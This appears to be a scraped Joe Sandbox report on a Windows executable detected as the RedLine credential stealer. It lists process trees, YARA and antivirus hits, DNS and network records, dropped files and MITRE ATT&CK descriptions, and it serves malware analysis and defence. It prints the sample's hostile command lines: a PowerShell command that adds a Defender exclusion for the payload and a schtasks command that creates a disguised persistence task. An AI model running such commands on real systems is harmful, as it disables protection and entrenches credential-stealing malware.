Jun 15, 2024 20:22:23.524715900 CEST	55615	49720	45.137.22.67	192.168.2.5

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 15, 2024 20:22:19.792176008 CEST	61337	53	192.168.2.5	1.1.1.1
Jun 15, 2024 20:22:33.087971926 CEST	52659	53	192.168.2.5	1.1.1.1

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 15, 2024 20:22:19.799233913 CEST	1.1.1.1	192.168.2.5	0x57cb	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 15, 2024 20:22:33.103152990 CEST	1.1.1.1	192.168.2.5	0x1de4	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

Target ID:	0
Start time:	14:21:59
Start date:	15/06/2024
Path:	C:\Users\user\Desktop\w4XFffGDz1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\w4XFffGDz1.exe"
Imagebase:	0x170000
File size:	920'266 bytes
MD5 hash:	2185ECDE5380054AD075B7A25AE0EA51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	14:22:01
Start date:	15/06/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0x600000
File size:	743'944 bytes
MD5 hash:	86F98523CEB67DF5CC3431A839F63134
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs Detection: 58%, Virustotal, Browse
Reputation:	low
Has exited:	true

Target ID:	8
Start time:	14:22:08
Start date:	15/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0x8d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	14:22:10
Start date:	15/06/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0xcb0000
File size:	743'944 bytes
MD5 hash:	86F98523CEB67DF5CC3431A839F63134
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	16
Start time:	14:22:11
Start date:	15/06/2024
Path:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
Imagebase:	0xb00000
File size:	743'944 bytes
MD5 hash:	86F98523CEB67DF5CC3431A839F63134
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 88%, ReversingLabs Detection: 58%, Virustotal, Browse
Reputation:	low
Has exited:	true

Target ID:	19
Start time:	14:22:18
Start date:	15/06/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
Imagebase:	0xbb0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report w4XFffGDz1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AJzHYZtQIb.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.jpg

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fxchldq.gpv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5dgxrmw.020.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj5kt24d.bgw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncpykx4c.cxo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojbysllk.cf1.psm1

Windows Analysis Report
w4XFffGDz1.exe

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre